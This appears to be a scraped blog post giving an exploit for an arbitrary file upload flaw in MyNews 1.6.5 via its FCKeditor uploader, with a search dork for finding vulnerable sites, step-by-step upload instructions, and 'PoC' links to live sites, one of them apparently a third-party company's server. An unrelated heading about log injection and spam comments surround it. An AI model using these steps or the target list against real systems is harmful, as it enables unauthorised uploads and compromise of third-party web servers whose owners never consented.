LFI to RCE via access_log injection

MyNews Arbitrary File Upload Vuln

[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe


[o] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"

http://localhost/[path]/files/your_file.txt


[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html

Comments

Pretty good post, this is one of the best articles that I have ever seen !
-------------------------------
uk essay
Unknown said…
Your blog is excellent. Let me inform u one thing that post have become most up-to-date and vital source of quality free information.
--------------------------------
Custom Dissertations